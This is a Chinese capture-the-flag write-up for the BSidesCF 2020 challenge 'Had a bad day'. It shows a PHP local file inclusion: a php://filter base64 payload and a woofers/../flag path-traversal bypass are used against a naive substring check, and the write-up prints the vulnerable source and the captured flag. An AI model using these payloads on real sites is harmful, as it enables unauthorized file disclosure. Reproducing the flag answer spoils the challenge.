[BSidesCF 2020]Had a bad day1

题目

这里有传参

文件包含使用伪协议读取flag

先读取index.php查看

复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=index

解码

index.php源码

php 复制代码
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php

尝试直接读取/index.php?category=woofers/../flag

php 复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag

解码

拿下flag

flag{85254eba-a050-49cd-a3be-4e9859e51241}

相关推荐
小张是铁粉17 分钟前
oracle的内存架构学习
数据库·学习·oracle·架构
HERR_QQ28 分钟前
【unify】unify的微信小程序开发学习 (to be continued)
学习·微信小程序·小程序
码荼10 小时前
学习开发之hashmap
java·python·学习·哈希算法·个人开发·小白学开发·不花钱不花时间crud
武昌库里写JAVA11 小时前
Oracle如何使用序列 Oracle序列使用教程
java·开发语言·spring boot·学习·课程设计
祁思妙想11 小时前
八股学习(三)---MySQL
数据库·学习·mysql
amazinging12 小时前
北京-4年功能测试2年空窗-报培训班学测开-第四十一天
python·学习·appium
Jyywww12112 小时前
微信小程序学习笔记
笔记·学习·微信小程序
amazinging12 小时前
北京-4年功能测试2年空窗-报培训班学测开-第三十九天
python·学习·appium
每次的天空13 小时前
Android-自定义View的实战学习总结
android·学习·kotlin·音视频
重庆小透明13 小时前
力扣刷题记录【1】146.LRU缓存
java·后端·学习·算法·leetcode·缓存